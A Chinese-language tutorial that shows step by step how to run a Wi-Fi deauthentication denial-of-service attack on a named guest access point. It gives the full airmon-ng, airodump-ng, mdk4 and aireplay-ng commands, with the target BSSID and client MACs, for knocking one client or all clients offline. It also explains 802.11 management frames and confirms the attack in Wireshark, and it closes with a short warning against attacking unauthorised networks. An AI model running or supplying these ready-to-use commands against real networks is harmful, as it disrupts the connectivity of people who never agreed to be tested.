取消认证攻击是最简单的攻击手段之一,但破坏性奇高,可以轻易让无线网络环境瘫痪。
ip addr
airmon-ng check kill
airmon-ng start wlan0
airmon-ng
airodump-ng wlan0mon
目标AP:
ESSID: TPGuest-77E0
BSSID: 82:8F:1D:FB:77:E0
Channel: 1
airodump-ng --bssid 82:8F:1D:FB:77:E0 -c 1 wlan0mon
设备一:E0:DC:FF:CC:0E:91
设备二:18:01:F1:B2:B3:02
-
针对指定客户端
mdk4 wlan0mon d -B 82:8F:1D:FB:77:E0 -c 1 -S E0:DC:FF:CC:0E:91
-
针对所有客户端
mdk4 wlan0mon d -B 82:8F:1D:FB:77:E0 -c 1
-
针对指定客户端
aireplay-ng --deauth 0 -a 82:8F:1D:FB:77:E0 -c E0:DC:FF:CC:0E:91 wlan0mon
-
针对所有客户端
aireplay-ng --deauth 0 -a 82:8F:1D:FB:77:E0 wlan0mon
802.11 协议将所有的数据分为三种:
数据帧
管理帧
控制帧
管理帧主要用来
STA
连接和断开无线网络,总共12个管理帧。
Association request (subtype 0x0)
Association response (subtype 0x1)
Reassociation request (subtype 0x2)
Reassociation response (subtype 0x3)
Probe request (subtype 0x4)
Probe response (subtype 0x5)
Beacon (subtype 0x8)
ATIM (subtype 0x9)
Disassociation (subtype 0xa)
Authentication (subtype 0xb)
Deauthentication (subtype 0xc)
Action (subtype 0xd)
AP
广播发送Beacon(信标帧)
STA
向AP
发送携带有指定SSID的Probe Request
(探测请求帧)
AP
向STA
发送Probe Response
(探测回应帧)
STA
对AP
发送Authentication Request
(认证请求帧)
AP
向STA
发送Authentiction Response (Challenge)
(加密认证)
STA
对AP
发送Authentication Response (Encrypted Challenge)
(加密认证)
AP
向STA
发送Authentiction Response
(认证应答帧)
STA
向AP
发送Association Request
(关联请求帧)
AP
向STA
发送Association Response
(关联应答帧)*** 正常数据传输(浏览网页、看视屏等)***
STA
向AP
发送Disassociation
(取消关联帧)
Deauthentication
攻击
如果一个
STA
想要从AP
取消认证,或者一个AP
想要从STA
取消认证,无论哪一个设备都可以发送取消认证帧。因为认证帧是关联帧的先决条件,所以取消认证帧会自动的导致取消关联发生。取消认证帧不能被任何一方拒绝,除非双方已经协商了管理帧保护协议(定义在
802.11w
),并且MIC
完整性检查失败。结论:取消认证帧的发送会导致
STA
断开网络。
Disassociation
攻击
一旦
STA
连接到AP
,任何一方都可以通过发送取消连接帧来中断连接。它和取消认证帧有相同的帧格式。如果手动点击断开连接或者
STA
想要切换网络(比如漫游),那么STA
就会发送取消连接帧。如果
STA
尝试发送不合法的参数,AP
会发送取消连接帧。结论:取消连接帧的发送会导致
STA
断开网络。
-
打开
Wireshark
-
选择网卡
wlan0mon
-
双击开始抓包
-
针对设备一进行取消认证攻击
mdk4 wlan0mon d -B 82:8F:1D:FB:77:E0 -c 1 -S E0:DC:FF:CC:0E:91
-
停止攻击
-
停止抓包
通过显示过滤器来查看所需要的数据。
-
查看取消认证帧(Deauthentication)
wlan.fc.type_subtype == 12
发现网络中出现了大量的取消认证帧(Deauthentication),三向发送(AP-->STA, STA-->AP, AP-->AP。暂不清楚AP-->AP产生原因及用处)。
-
查看取消关联帧(Disassociation)
wlan.fc.type_subtype == 10
发现网络中出现了大量的取消关联帧(Disassociation),三向发送(AP-->STA, STA-->AP, AP-->AP。暂不清楚AP-->AP产生原因及用处)。
-
打开
Wireshark
-
选择网卡
wlan0mon
-
双击开始抓包
-
针对设备一进行取消认证攻击
aireplay-ng --deauth 0 -a 82:8F:1D:FB:77:E0 -c E0:DC:FF:CC:0E:91 wlan0mon
-
停止攻击
-
停止抓包
通过显示过滤器来查看所需要的数据。
-
查看取消认证帧(Deauthentication)
wlan.fc.type_subtype == 12
发现网络中出现了大量的取消认证帧(Deauthentication),两个一组,双向发送。
-
查看取消关联帧(Disassociation)
wlan.fc.type_subtype == 10
网络中没有取消关联帧
进行取消认证攻击时网络中会出现大量取消认证帧。正是这些取消认证帧导致了设备一与AP
断开。验证了以此方法进行拒绝服务攻击(DoS)的可行性。
攻击未授权的无线设备涉嫌违法,切勿以身试法。